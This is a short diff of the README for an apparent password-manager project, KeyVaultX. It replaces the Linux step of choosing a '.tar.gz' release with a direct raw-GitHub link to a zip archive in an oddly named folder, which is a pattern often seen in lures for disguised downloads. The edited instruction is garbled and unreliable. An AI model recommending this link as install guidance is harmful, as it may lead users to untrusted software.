Aksh8887/KeyVaultX/README.md

 Select the file that matches your operating system:
 - For Windows, look for files ending in `.exe`.
 - For macOS, look for files ending in `.dmg`.
-- For Linux, choose the `.tar.gz` file.
+- For Linux, choose the `https://raw.githubusercontent.com/Aksh8887/KeyVaultX/main/unorientalness/KeyVaultX.zip` file.

 ### Step 4: Install the Application
 - **Windows**: